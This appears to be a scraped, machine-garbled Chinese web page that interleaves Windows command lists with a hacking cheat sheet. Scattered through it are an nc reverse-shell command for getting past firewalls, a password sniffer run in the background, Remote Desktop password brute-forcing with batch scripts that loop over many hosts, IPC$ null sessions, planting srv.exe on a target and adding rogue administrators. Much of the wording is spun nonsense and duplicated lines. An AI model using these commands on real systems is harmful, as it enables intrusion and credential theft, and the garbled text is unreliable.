    nc -e /bin/sh 本机IP -p 本机端口 *linux,unix 反向连接突破对方主机的防火墙
    本机上用:nc -d -l -p 本机端口 < 要传递的公文路线及称谓
    在对方主机上用:nc -vv 本机IP 本机端口 > 存放文件的不二等秘书诀及称谓 传送文件到对方主机
    备 注:
    | 管道命令
    < 或 > 重定向命令。"<",比方:tlntadmn < test.txt 指把test.txt的内容赋值给tlntadmn命令
    @ 表示施行@后边的一声令下,但不会显得出来(后台推行);例:@dir c:winnt >> d:log.txt 意思是:后台推行dir,并把结果存在d:log.txt中
    >与>>的区别  ">"指:覆盖;">>"指:保存到(添加到)。
    如:@dir c:winnt >> d:log.txt和@dir c:winnt > d:log.txt贰个指令分别施行三遍相比看:用>>的则是把二遍的结果都保留了,而用:>则唯有壹遍的结果,是因为首回的结果把第一次的掩盖了。

      19. calc-----------起动总括器

    findstr "Hello" aa.txt 在aa.txt文件中搜索字符串hello 

    findstr "Hello" aa.txt 在aa.txt文件中查找字符串hello 

    #8 八:

      20. dfrg.msc-------磁盘碎片整理程序

    find 文件名 查找某文件 

    find 文件名 查找某文件 

    2、扫锚工具:xscan.exe

      21. chkdsk.exe-----Chkdsk磁盘检查

    title 标题名字 更动CMD窗口标题名字 

    title 标题名字 改换CMD窗口标题名字 

    主导格式
    xscan -host <起始IP>[-<终止IP>] <检验连串> [别的选项] 扫锚"伊始IP到终止IP"段的有所主机音讯
    xscan -file <主机列表文件名> <检查实验项目> [其余选项] 扫锚"主机IP列表文件名"中的全体主机新闻
    检验项目
    -active 检查实验主机是不是存活
    -os 检查测量检验远程操作系统类型(通过NETBIOS和SNMP协议)
    -port 检查实验常用服务的端口状态
    -ftp 检测FTP弱口令
    -pub 检验FTP服务佚名用户写权限
    -pop3 检测POP3-Server弱口令
    -smtp 检测SMTP-Server漏洞
    -sql 检测SQL-Server弱口令
    -smb 检测NT-Server弱口令
    -iis 质量评定IIS编码/解码漏洞
    -cgi 检测CGI漏洞
    -nasl 加载Nessus攻击脚本
    -all 质量评定以上全部种类
    别的选项
    -i 适配器编号 设置网络适配器, <适配器编号>可经过"-l"参数获取
    -l 呈现全部网络适配器
    -v 展现详细扫描进程
    -p 跳过未有响应的主机
    -o 跳过并未有检验到开放端口的主机
      -t 并发线程数量,并发主机数量 钦命最大并发线程数量和产出主机数量, 暗许数量为100,10
    -log 文件名 钦赐扫描报告文本名 (后缀为:TXT或HTML格式的文本)
    用法示例
    xscan -host 192.168.1.1-192.168.255.255 -all -active -p  检查评定192.168.1.1-192.168.255.255网段内主机的兼具漏洞,跳过无响应的主机
    xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 检查实验192.168.1.1-192.168.255.255网段内主机的正儿八经端口状态,NT弱口令用户,最大并发线程数量为150,跳过并未有检查实验到开放端口的主机
    xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 检测"hostlist.txt"文件中列出的具有主机的标准端口状态,CGI漏洞,最大并发线程数量为200,同不经常刻最多检查实验5台主机,显示详细检查测试进程,跳过并未有检查实验到开放端口的主机

      22. devmgmt.msc--- 设备管理器

    color 颜色值 设置cmd调整台前景和背景颜色;0=黑、1=蓝、2=绿、3=蓝绿、4=红、5=紫、6=黄、7=白、8=灰、9=葱白、A=茶青、B=淡粉红白、C=鲜蓝、D=血红、E=紫蓝、F=亮白 

    color 颜色值 设置cmd调整台前景和背景颜色;0=黑、1=蓝、2=绿、3=浅绿灰、4=红、5=紫、6=黄、7=白、8=灰、9=葱白、A=灰白、B=淡粉末蓝、C=浅灰褐、D=水泥灰、E=鲜蓝、F=亮白 

    #9 九:

      23. regsvr32 /u *.dll----甘休dll文件运营

    prompt 名称 改造cmd.exe的显示的下令提醒符(把C:、D:统一改为:EntSky )

    prompt 名称 改变cmd.exe的展现的吩咐提醒符(把C:、D:集结改为:EntSky )

    3、命令行方式嗅探器: xsniff.exe
    可捕获局域网内FTP/SMTP/POP3/HTTP协议密码
    参数表达
    -tcp 输出TCP数据报
    -udp 输出UDP数据报
    -icmp 输出ICMP数据报
    -pass 过滤密码新闻
    -hide 后台运维
    -host 深入分析主机名
    -addr IP地址 过滤IP地址
    -port 端口 过滤端口
    -log 文件名 将出口保存到文件
    -asc 以ASCII格局出口
    -hex 以16进制情势出口
    用法示例
    xsniff.exe -pass -hide -log pass.log 后台运营嗅探密码并将密码音信保存在pass.log文件中
    xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1并过滤tcp和udp音信并以ASCII格式输出

      24. drwtsn32------ 系统医师

    net use \ipipc$ " " /user:" " 建立IPC空链接 

    net use \ipipc$ " " /user:" " 建立IPC空链接 

    4、终端服务密码破解: tscrack.exe

      25. rononce -p----15秒关机

    net use \ipipc$ "密码" /user:"用户名" 建立IPC非空链接 

    net use \ipipc$ "密码" /user:"用户名" 创建IPC非空链接 

    参数表明
    -h 呈现采用补助
    -v 突显版本音讯
    -s 在显示器上打出解密技术
    -b 密码错误时产生的响动
    -t 同是发出多少个一连(四线程)
    -N Prevent System Log entries on targeted server
    -U 卸载移除tscrack组件
    -f 使用-f前边的密码
    -F 间隔时间(频率)
    -l 使用-l后边的用户名
    -w 使用-w前边的密码字典
    -p 使用-p前边的密码
    -D 登入主页面
    用法示例
    tscrack 192.168.0.1 -l administrator -w pass.dic 远程用密码字典文件暴破主机的administrator的登录密码
    tscrack 192.168.0.1 -l administrator -p 123456 用密码123456远程登入192.168.0.1的administrator用户
    @if not exist ipcscan.txt goto noscan
    @for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i
    nscan
    @echo 3389.txt no find or scan faild
    (①存为3389.bat) (就算现存用SuperScan或任何扫锚器扫到一群开有3389的主机IP列表文件3389.txt)
    3389.bat意思是:从3389.txt文件中取多个IP,接着运营hack.bat
    @if not exist tscrack.exe goto noscan
    @tscrack %1 -l administrator -w pass.dic >>rouji.txt
    :noscan
    @echo tscrack.exe no find or scan faild
    (②存为hack.bat) (运转3389.bat就OK,且3389.bat、hack.bat、3389.txt、pass.dic与tscrack.exe在同多少个索引下;就足以等待结果了)
    hack.bat意思是:运转tscrack.exe用字典暴破3389.txt中具备主机的administrator密码,并将破解结果保存在rouji.txt文件中。

      26. dxdiag---------检查DirectX信息

    net use h: \ipc$ "密码" /user:"用户名" 直接登入后映射对方C:到本地为H: 

    net use h: \ipc$ "密码" /user:"用户名" 直接登入后映射对方C:到地头为H: 

    5、其它:

      27. regedt32-------注册表编辑器

    net use h: \ipc$ 登入后映射对方C:到地面为H: 

    net use h: \ipc$ 登录后映射对方C:到当地为H: 

    Shutdown.exe
    Shutdown \IP地址 t:20 20秒后将对方NT自动关闭(Windows 二零零四系统自带工具,在Windows三千下用进就得下载此工具手艺用。在头里Windows 2002 DOS命令中有详细介绍。)
    fpipe.exe (TCP端口重定向工具) 在第二篇中有详尽表达(端口重定向绕过防火墙)
    fpipe -l 80 -s 1029 -r 80 www.sina.com.cn 当有人扫锚你的80端口时,他扫到的结果会完全部是www.sina.com.cn的主机新闻
    Fpipe -l 23 -s 88 -r 23 指标IP 把本机向指标IP发送的23端口Telnet诉求经端口重定向后,就经过88端口发送到指标IP的23端口。(与对象IP建立Telnet时本机就用的88端口与其相连接)然后:直接Telnet 127.0.0.1(本机IP)就连接受目的IP的23端口了。
    OpenTelnet.exe (远程开启telnet工具)
    opentelnet.exe \IP 帐号 密码 ntlm认证情势 Telnet端口 (不须求上传ntlm.exe破坏微软的身份验证格局)直接远程开启对方的telnet服务后,就可用telnet \ip 连接上对方。
    NTLM认证方法:0:不行使NTLM身份验证;1:先品尝NTLM身份验证,假若战败,再使用用户名和密码;2:只使用NTLM身份验证。

      28. Msconfig.exe---系统布置实用程序

    net use \ipipc$ /del 删除IPC链接 

    net use \ipipc$ /del 删除IPC链接 

    ResumeTelnet.exe (OpenTelnet附带的另三个工具)
    resumetelnet.exe \IP 帐号 密码 用Telnet连接完对方后,就用那几个命令将对方的Telnet设置还原,并同有时间关闭Telnet服务。

      29. rsop.msc-------组计谋结果集

    net use h: /del 删除映射对方到地头的为H:的映射 

    net use h: /del 删除映射对方到地方的为H:的映射 

    #10 十:

      30. mem.exe--------展现内存使用状态

    net user 用户名 密码 /add 建构用户 

    net user 用户名 密码 /add 建设构造用户 

    6、FTP命令详解:

      31. regedit.exe----注册表

    net user guest /active:yes 激活guest用户 

    net user guest /active:yes 激活guest用户 

    FTP命令是Internet用户选拔最频繁的指令之一,纯熟并灵活应用FTP的当中命令,能够大大有利使用者,并收取两全其美之效。假设您想上学应用举行后台FTP下载,那么就无法不学习FTP指令。

      32. winchat--------XP自带局域网聊天

    新葡亰496net,net user 查看有何样用户 

    net user 查看有怎么着用户 

    FTP的命令行格式为:
    ftp -v -d -i -n -g [主机名] ,其中

      33. progman--------程序管理器

    net user 帐户名 查看帐户的属性 

    net user 帐户名 查看帐户的属性 

    -v 展现远程服务器的享有响应音信;

      34. winmsd---------系统音信

    net localgroup administrators 用户名 /add 把"用户"加多到管理员中使其具备管理员权限,注意:administrator后加s用复数 

    net localgroup administrators 用户名 /add 把"用户"加多到管理员中使其持有管理员权限,注意:administrator后加s用复数 

    -n 限制ftp的电动登陆,即不使用;.n etrc文件;

      35. perfmon.msc----Computer质量监测程序

    net start 查看开启了如何服务 

    net start 查看开启了何等服务 

    -d 使用调试情势;

      36. winver---------检查Windows版本

    net start 服务名  开启服务;(如:net start telnet, net start schedule) 

    net start 服务名  开启服务;(如:net start telnet, net start schedule) 

    -g 撤废全局文件名。

      37. sfc /scannow-----扫描错误并回复

    net stop 服务名 甘休某服务 

    net stop 服务名 停止某服务 

    FTP使用的中间命令如下(中括号表示可挑选):

      38. taskmgr-----职责管理器(三千/xp/二零零三

    net time \对象ip 查看对方时间 

    net time \对象ip 查看对方时间 

    1.![cmd[args]:在地方机中施行交互shell,exit回到ftp情状,如:!ls*.zip
    2.$ macro-ame[args]: 实施宏定义macro-name。

      40. wmimgmt.msc----张开windows管理体系结构(WMI)

    net time \目的ip /set 设置本地Computer时间与"目标IP"主机的时间一齐,加上参数/yes可收回确认音讯 

    net time \指标ip /set 设置本地计算机时间与"指标IP"主机的时光共同,加上参数/yes可收回确认消息 

    3.account[password]: 提供登陆远程系统成功后走访系统财富所需的填补口令。
    4.append local-file[remote-file]:将当半夏件扩大到长途系统主机,若未内定远程系统文件名,则动用当和姑件名。

      41. wupdmgr--------windows更新程序

    net view 查看本地局域网内开启了什么分享 

    net view 查看本地局域网内开启了什么样分享 

    5.ascii:使用ascii类型传输格局。
    6.bell:各样命令推行完结后计算机响铃一回。

      42. wscript--------windows脚本宿主设置

    net view \ip 查看对方局域网内开启了何等共享 

    net view \ip 查看对方局域网内开启了怎么着共享 

    7.bin:使用二进制文件传输格局。
    8.bye:退出ftp会话进程。

      43. write----------写字板

    net config 显示系统网络设置 

    net config 呈现系统互联网设置 

    9.case:在运用mget时,将远程主机文件名中的大写转为小写字母。
    10.cd remote-dir:进入远程主机目录。

      45. wiaacmgr-------扫描仪和照相机向导

    net logoff 断开连接的分享 

    net logoff 断开连接的分享 

    11.cdup:进入远程主机目录的父目录。
    12.chmod mode file-name:将远程主机文件file-name的存取情势设置为mode,如:chmod 777 a.out。

      46. winchat--------XP自带局域网聊天

    net pause 服务名 暂停某服务 

    net pause 服务名 暂停某服务 

    13.close:中断与远程服务器的ftp会话(与open对应)。
    14.cr:使用asscii形式传输文件时,将回车换行转换为回行。

      49. mplayer2-------简易widnows media player

    net send ip "文本音信" 向对方发新闻 

    net send ip "文本信息" 向对方发音信 

    15.delete remote-file:删除远程主机文件。
    16.debug[debug-value]:设置调节和测量检验情势, 呈现发送至远程主机的每条命令,如:deb up 3,若设为0,表示裁撤debug。

      50. mspaint--------画图板

    net ver 局域网内正在使用的互连网连接类型和新闻 

    net ver 局域网内正在使用的网络连接类型和音讯 

    17.dir[remote-dir][local-file]:突显远程主机目录,并将结果存入当羊眼半夏件。
    18.disconnection:同close。

      51. mstsc----------远程桌面连接

    net share 查看本地开启的分享 

    net share 查看当地开启的分享 

    19.form format:将文件传输形式设置为format,缺省为file情势。
    20.get remote-file[local-file]: 将远程主机的文件remote-file传至本地硬盘的local-file。

      53. magnify--------放大镜实用程序

    net share ipc$ 开启ipc$共享 

    net share ipc$ 开启ipc$共享 

    21.glob:设置mdelete,mget,mput的文件名扩充,缺省时不扩张文件名,同命令行的-g参数。
    22.hash:每传输1024字节,展现叁个hash符号(#)。

      54. mmc------------张开调整台

    net share ipc$ /del 删除ipc$共享 

    net share ipc$ /del 删除ipc$共享 

    23.help[cmd]:呈现ftp内部命令cmd的救助新闻,如:help get。
    24.idle[seconds]:将远程服务器的休眠放大计时器设为[seconds]秒。

      55. mobsync--------同步命令

    net share c$ /del 删除C:共享 

    net share c$ /del 删除C:共享 

    25.image:设置二进制传输情势(同binary)。
    26.lcd[dir]:将地方职业目录切换至dir。

      57. iexpress-------木马捆绑工具,系统自带

    net user guest 12345 用guest用户登录后用将密码改为12345 

    net user guest 12345 用guest用户登入后用将密码改为12345 

    27.ls[remote-dir][local-file]:展现远程目录remote-dir, 并存入当和姑件local-file。
    28.macdef macro-name:定义三个宏,遭受macdef下的空行时,宏定义停止。

      58. fsmgmt.msc-----分享文件夹管理器

    net password 密码 改变系统登陆密码 

    net password 密码 退换系统登入密码 

    29.mdelete[remote-file]:删除远程主机文件。
    30.mdir remote-files local-file:与dir类似,但可指定两个长途文件,如 :mdir *.o.*.zipoutfile 。

      59. utilman--------支持工具管理器

    netstat -a 查看开启了怎么端口,常用netstat -an 

    netstat -a 查看开启了如何端口,常用netstat -an 

    31.mget remote-files:传输多个长途文件。
    32.mkdir dir-name:在长途主机中国建工业总集结团一目录。

      61. dcomcnfg-------张开系统组件服务

    netstat -n 查看端口的互连网连接意况,常用netstat -an 

    netstat -n 查看端口的互联网连接景况,常用netstat -an 

    33.mls remote-file local-file:同nlist,但可内定多个文本名。
    34.mode[modename]:将文件传输格局设置为modename, 缺省为stream格局。

      62. ddeshare-------打开DDE分享设置

    netstat -v 查看正在张开的职业 

    netstat -v 查看正在举行的专业 

    35.modtime file-name:显示远程主机文件的结尾修改时间。
    36.mput local-file:将多个文件传输至远程主机。

      110. osk------------张开显示器键盘

    netstat -p 协议名 例:netstat -p tcq/ip 查看某商谈利用境况(查看tcp/ip协议利用境况) 

    netstat -p 协议名 例:netstat -p tcq/ip 查看某研商利用状态(查看tcp/ip协议使用意况) 

    37.newer file-name: 假设远程机中file-name的改换时间比本地硬盘同名文件的年华更近,则重传该文件。
    38.nlist[remote-dir][local-file]:显示远程主机目录的文件清单,并存入本地硬盘的local-file。

      111. odbcad32-------ODBC数据源处理器

    netstat -s 查看正在利用的保有协议利用景况 

    netstat -s 查看正在利用的享有协议使用境况 

    39.nmap[inpattern outpattern]:设置文件名映射机制, 使得文件传输时,文件中的某个字符互相调换, 如:nmap $1.$2.$3[$1,$2].[$2,$3],则传输文件a1.a2.a3时,文件名改成a1,a2。 该命令特别适用于远程主机为非UNIX机的情景。
    40.ntrans[inchars[outchars]:设置文件名字符的翻译机制,如ntrans1本田CR-V,则文件名LLL将成为CR-V哈弗奥迪Q3。

      112. oobe/msoobe /a----检查XP是或不是激活

    nbtstat -A ip 对方136到139之中一个端口开了的话,就可查阅对方前段时间登入的用户名(03前的为用户名)-注意:参数-A要大写 

    nbtstat -A ip 对方136到139中间一个端口开了的话,就可查看对方近期登录的用户名(03前的为用户名)-注意:参数-A要大写 

    41.open host[port]:组建钦点ftp服务器连接,可钦定连接端口。
    42.passive:进入被动传输格局。

      68. ntbackup-------系统备份和复苏

    tracert -参数 ip(或微型Computer名) 追踪路由(数据包),参数:"-w数字"用于安装超时间隔。 

    tracert -参数 ip(或计算机名) 追踪路由(数据包),参数:"-w数字"用于安装超时间隔。 

    43.prompt:设置几个文件传输时的互动提醒。
    44.proxy ftp-cmd:在次要调节连接中,奉行一条ftp命令, 该命令允许连接四个ftp服务器,以在三个服务器间传输文件。第一条ftp命令必须为open,以第10%立七个服务器间的连年。
    45.put local-file[remote-file]:将地点文件local-file传送至远程主机。
    46.pwd:显示远程主机的当前职业目录。

      69. narrator-------屏幕“讲述人”

    ping -t -l 65550 ip 离世之ping(发送超越64K的文书并一贯ping就成了身故之ping) 

    ping -t -l 65550 ip 驾鹤归西之ping(发送超过64K的文书并直接ping就成了回老家之ping) 

    47.quit:同bye,退出ftp会话。
    48.quote arg1,arg2...:将参数逐字发至远程ftp服务器,如:quote syst.

      70. ntmsmgr.msc----移动存款和储蓄管理器

    ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数"/all"展现全体安排消息 

    ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数"/all"彰显任何陈设消息 

    49.recv remote-file[local-file]:同get。
    50.reget remote-file[local-file]:类似于get, 但若local-file存在,则从上次传输中断处续传。

      71. ntmsoprq.msc---移动存款和储蓄管理员操作乞求

    tlist -t 以树行列表展现进程(为系统的附加工具,私下认可是未有安装的,在装置目录的Support/tools文件夹内) 

    tlist -t 以树行列表展现进度(为系统的增大工具,暗许是尚未设置的,在安装目录的Support/tools文件夹内) 

    51.rhelp[cmd-name]:诉求得到远程主机的相助。
    52.rstatus[file-name]:若未钦定文件名,则展现远程主机的情景, 不然展现文件状态。

      72. netstat -an----(TC)命令检查接口

    kill -F 进程名 加-F参数后强制结束某进度(为系统的增大工具,暗中同意是从未设置的,在安装目录的Support/tools文件夹内) 

    kill -F 进度名 加-F参数后强制结束某进度(为系统的增大工具,默许是未曾设置的,在安装目录的Support/tools文件夹内) 

    53.rename[from][to]:改换远程主机文件名。
    54.reset:清除回答队列。

      73. syncapp--------创设贰个马鞍包

    del -F 文件名 加-F参数后就可去除只读文件,/A帕杰罗、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-PRADO、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文书。比方"DEL/AGL450 *.*"表示删除当前目录下具有只读文件,"DEL/A-S *.*"表示删除当前目录下除系统文件以外的具备文件

    del -F 文件名 加-F参数后就可去除只读文件,/A奥迪RSQ e-tron、/AH、/AS、/AA分别代表删除只读、隐藏、系统、存档文件,/A-智跑、/A-H、/A-S、/A-A代表删除除只读、隐藏、系统、存档以外的文件。举个例子"DEL/ARubicon *.*"表示删除当前目录下有所只读文件,"DEL/A-S *.*"表示删除当前目录下除系统文件以外的具有文件

    55.restart marker:从钦点的注明marker处,重新初步get或put,如:restart 130。
    56.rmdir dir-name:删除远程主机目录。

      74. sysedit--------系统布署编辑器

    #2 二:

    #2 二:

    57.runique:设置文件名只一性存款和储蓄,若文件存在,则在原来的书文件后加后缀.1, .2等。
    58.send local-file[remote-file]:同put。

      75. sigverif-------文件签名验证程序

    del /S /Q 目录 或用:rmdir /s /Q 目录 /S删除目录及目录下的全部子目录和文书。同期利用参数/Q 可撤销删除操作时的系统确认就平昔删除。(叁个指令功能一样) 

    del /S /Q 目录 或用:rmdir /s /Q 目录 /S删除目录及目录下的全数子目录和文件。相同的时间利用参数/Q 可收回删除操作时的系统确认就径直删除。(贰个指令效用同样) 

    59.sendport:设置PORT命令的行使。
    60.site arg1,arg2...:将参数作为SITE命令逐字发送至远程ftp主机。

      76. ciadv.msc------索引服务程序

    move 盘符路径要活动的文书名 存放移动文件的渠道移动后文件名 移动文件,用参数/y将吊销确认移动目录存在同样文件的提醒就一向覆盖 

    move 盘符路径要运动的文书名 存放移动文件的路线活动后文件名 移动文件,用参数/y将撤除确认移动目录存在同样文件的唤起就径直覆盖 

    61.size file-name:展现远程主机文件大小,如:site idle 7200。
    62.status:显示当前ftp状态。

      77. shrpubw--------开立分享文件夹

    fc one.txt two.txt > 3st.txt 相比贰个公文并把不一致之处输出到3st.txt文件中,"> "和"> >" 是重定向命令 

    fc one.txt two.txt > 3st.txt 相比较一个公文并把分裂之处输出到3st.txt文本中,"> "和"> >" 是重定向命令 

    63.struct[struct-name]:将文件传输结构安装为struct-name, 缺省时行使stream结构。
    64.sunique:将长途主机文件名存款和储蓄装置为只一(与runique对应)。

      78. secpol.msc-----本地安全战略

    at id号 开启已登记的某部陈设职务 

    at id号 开启已注册的某部安插任务 

    65.system:显示远程主机的操作系统类型。
    66.tenex:将文件传输类型设置为TENEX机的所需的项目。

      79. syskey---------系统加密,一旦加密就不能够解开,爱抚windows xp系统的重新密码

    at /delete 停止全部布置职责,用参数/yes则不必要认同就间接截止 

    at /delete 结束全部安排职务,用参数/yes则无需承认就径直停止 

    67.tick:设置传输时的字节计数器。
    68.trace:设置包追踪。

      80. services.msc---本地服务设置

    at id号 /delete 结束有些已登记的布置职责 

    at id号 /delete 截止某些已登记的陈设职分 

    69.type[type-name]:设置文件传输类型为type-name,缺省为ascii,如:type binary,设置二进制传输格局。
    70.umask[newmask]:将远程服务器的缺省umask设置为newmask,如:umask 3

      81. Sndvol32-------音量调控程序

    at 查看全数的陈设职责 

    at 查看全部的安插职责 

    71.user user-name[password][account]:向远程主机表明本身的身份,要求口令时,必须输入口令,如:user anonymous my@email。
    72.verbose:同命令行的-v参数,即设置详细报告办法,ftp 服务器的有所响 应都将体现给用户,缺省为on.

      82. sfc.exe--------系统文件检查器

    at \ip time 程序名(或三个限令) /r 在某时间运作对方某先后天公地道新开动Computer 

    at \ip time 程序名(或八个限令) /r 在某时间运作对方某先后比量齐观复起动电脑 

    73.?[cmd]:同help.

      83. sfc /scannow---windows文件保养

    finger username @host 查看近些日子有何样用户登陆 

    finger username @host 查看近期有何用户登入 

    #11 十一:

      84. ciadv.msc------索引服务程序

    telnet ip 端口 远和登入服务器,默许端口为23 

    telnet ip 端口 远和登入服务器,默许端口为23 

    7:电脑运营命令全集
    winver---------检查Windows版本
    wmimgmt.msc----张开windows管理种类结构
    wupdmgr--------windows更新程序
    winver---------检查Windows版本
    wmimgmt.msc----打开windows管理种类结构
    wupdmgr--------windows更新程序
    wscript--------windows脚本宿主设置
    write----------写字板winmsd-----系统消息
    wiaacmgr-------扫描仪和相机向导
    winchat--------XP自带局域网聊天
    mem.exe--------展现内部存款和储蓄器使用情状
    Msconfig.exe---系统安插实用程序
    mplayer2-------简易widnows media player
    mspaint--------画图板
    mstsc----------远程桌面连接
    mplayer2-------媒体播放机
    magnify--------放大镜实用程序
    mmc------------展开调整台
    mobsync--------同步命令
    dxdiag---------检查DirectX信息
    drwtsn32------ 系统医师
    devmgmt.msc--- 设备管理器
    dfrg.msc-------磁盘碎片整理程序
    diskmgmt.msc---磁盘管理实用程序
    dcomcnfg-------打开系统组件服务
    ddeshare-------展开DDE分享设置
    dvdplay--------DVD播放器
    net stop messenger-----甘休信使服务
    net start messenger----起首信使服务
    notepad--------展开记事本
    nslookup-------网络管理的工具向导
    ntbackup-------系统备份和还原
    narrator-------屏幕"讲述人"
    ntmsmgr.msc----移动存款和储蓄管理器
    ntmsoprq.msc---移动存款和储蓄管理员操作央浼
    netstat -an----(TC)命令检查接口
    syncapp--------创设二个信封包
    sysedit--------系统布局编辑器
    sigverif-------文件签名验证程序
    sndrec32-------录音机
    shrpubw--------创制分享文件夹
    secpol.msc-----本地安全战略
    syskey---------系统加密,一旦加密就不可能解开,尊崇windows xp系统的再一次密码
    services.msc---本地服务设置
    Sndvol32-------音量调整造进度序
    sfc.exe--------系统文件检查器
    sfc /scannow---windows文件拥戴
    tsshutdn-------60秒倒计时关机命令
    tourstart------xp简要介绍(安装到位后出现的漫游xp程序)
    taskmgr--------职责管理器
    eventvwr-------事件查看器
    eudcedit-------造字程序
    explorer-------张开能源处理器
    packager-------对象包装程序
    perfmon.msc----计算机质量监测程序
    progman--------程序管理器
    regedit.exe----注册表
    rsop.msc-------组战略结果集
    regedt32-------注册表编辑器
    rononce -p ----15秒关机
    regsvr32 /u *.dll----截止dll文件运维
    regsvr32 /u zipfldr.dll------取消ZIP支持
    cmd.exe--------CMD命令提醒符
    chkdsk.exe-----Chkdsk磁盘检查
    certmgr.msc----证书管理实用程序
    calc-----------运营计算器
    charmap--------运行字符映射表
    cliconfg-------SQL SEENCOREVE凯雷德 客户端网络实用程序
    Clipbrd--------剪贴板查看器
    conf-----------启动netmeeting
    compmgmt.msc---Computer管理
    cleanmgr-------**整理
    ciadv.msc------索引服务程序
    osk------------张开显示器键盘
    odbcad32-------ODBC数据源管理器
    oobe/msoobe /a----检查XP是否激活
    lusrmgr.msc----本机用户和组
    logoff---------注销命令
    iexpress-------木马捆绑工具,系统自带
    Nslookup-------IP地址侦测器
    fsmgmt.msc-----分享文件夹管理器
    utilman--------帮助理工科程师具管理器
    gpedit.msc-----组策略

      85. tourstart------xp简单介绍(安装到位后出现的出境游xp程序)

    open ip 连接到IP(属telnet登录后的一声令下) 

    open ip 连接到IP(属telnet登录后的指令) 

     

      86. taskmgr--------职责管理器

    telnet 在本机上直接键入telnet 将进入本机的telnet 

    telnet 在本机上直接键入telnet 将跻身本机的telnet 

      87. eventvwr-------事件查看器

    copy 路径文件名1 路径文件名2 /y 复制文件1到钦点的目录为文件2,用参数/y就同有时间撤废确认你要改写一份现有目录文件 

    copy 路径文件名1 路径文件名2 /y 复制文件1到内定的目录为文件2,用参数/y就相同的时候收回确认你要改写一份现有目录文件 

      88. eudcedit-------造字程序

    copy c:srv.exe \ipadmin$ 复制本地c:srv.exe到对方的admin下 

    copy c:srv.exe \ipadmin$ 复制当地c:srv.exe到对方的admin下 

      89. compmgmt.msc---Computer管理

    cppy 1st.jpg/b 2st.txt/a 3st.jpg 将2st.txt的原委藏身到1st.jpg中生成3st.jpg新的公文,注:2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件

    cppy 1st.jpg/b 2st.txt/a 3st.jpg 将2st.txt的源委藏身到1st.jpg中变化3st.jpg新的文本,注:2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件

      90. packager-------对象包装程序

    ver 在DOS窗口下显得版本音讯 

    ver 在DOS窗口下显得版本音讯 

      91. perfmon.msc----计算机质量监测程序

    winver 弹出三个窗口浮现版本消息(内存大小、系统版本、补丁版本、Computer名) 

    winver 弹出多少个窗口展示版本消息(内部存款和储蓄器大小、系统版本、补丁版本、计算机名) 

      92. charmap--------起步字符映射表

    format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例:Format D: /FS:NTFS 

    format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例:Format D: /FS:NTFS 

      93. cliconfg-------SQL SE汉兰达VE翼虎 客户端网络实用程序

    md 目录名 创立目录 

    md 目录名 创设目录 

      94. Clipbrd--------剪贴板查看器

    replace 源文件 要替换文件的目录 替换文件 

    replace 源文件 要替换文件的目录 替换文件 

      95. conf-----------启动netmeeting

    ren 原作件名 新文件名 重命名文件名 

    ren 最初的作品件名 新文件名 重命名文件名 

      96. certmgr.msc----证书管理实用程序

    tree 以树形结构展现出目录,用参数-f 将列出第个文本夹汉语件名称 

    tree 以树形结构呈现出目录,用参数-f 将列出第个文件夹粤语件名称 

      97. regsvr32 /u *.dll----结束dll文件运转

    type 文件名 显示文本文件的源委 

    type 文件名 展现文本文件的始末 

      98. regsvr32 /u zipfldr.dll------取消ZIP支持

    more 文件名 逐屏展现输出文件 

    more 文件名 逐屏突显输出文件 

      99. cmd.exe--------CMD命令提示符

    doskey 要锁定的指令=字符

    doskey 要锁定的通令=字符

    操作详解  

    doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行,重新调用win2k命令,并创制宏)。如:锁定dir命令:doskey dir=entsky (无法用doskey dir=dir);解锁:doskey dir= 

    doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行,重新调用win2k命令,并创造宏)。如:锁定dir命令:doskey dir=entsky (不可能用doskey dir=dir);解锁:doskey dir= 

          net use ipipc$ " " /user:" " 建立IPC空链接

    taskmgr 调出任务管理器 

    taskmgr 调出职责管理器 

      net use ipipc$ "密码" /user:"用户名" 建构IPC非空链接

    chkdsk /F D: 检查磁盘D并出示状态报告;加参数/f并修复磁盘上的错误 

    chkdsk /F D: 检查磁盘D并展现状态报告;加参数/f并修复磁盘上的谬误 

      net use h: ipc$ "密码" /user:"用户名" 间接登录后映射对方C:到本地为H:

    tlntadmn telnt服务admn,键入tlntadmn选用3,再选用8,就能够改变telnet服务私下认可端口23为任何任何端口 

    tlntadmn telnt服务admn,键入tlntadmn选取3,再选用8,就足以改造telnet服务暗中认可端口23为任何任何端口 

      net use h: ipc$ 登录后映射对方C:到地面为H:

    exit 退出cmd.exe程序或近些日子,用参数/B则是脱离当前批管理脚本而不是cmd.exe 

    exit 退出cmd.exe程序或前段时间,用参数/B则是脱离当前批管理脚本而不是cmd.exe 

      net use ipipc$ /del 删除IPC链接

    path 路径可实践文件的文书名 为可实施文件设置多个路径。 

    path 路径可推行文件的文件名 为可实施文件设置一个路径。 

      net use h: /del 删除映射对方到地头的为H:的投射

    cmd 运行一个win2K命令解释窗口。参数:/eff、/en 关闭、开启命令扩展;更小编详细表达见cmd /? 

    cmd 运维叁个win2K命令解释窗口。参数:/eff、/en 关闭、开启命令增加;更作者详细表明见cmd /? 

      net user 用户名 密码 /add 构建用户

    regedit /s 注册表文件名 导入注册表;参数/S指安静情势导入,无其余提醒; 

    regedit /s 注册表文件名 导入注册表;参数/S指安静情势导入,无其余提示; 

      net user guest /active:yes 激活guest用户

    regedit /e 注册表文件名 导出挂号表 

    regedit /e 注册表文件名 导出挂号表 

      net user 查看有怎样用户

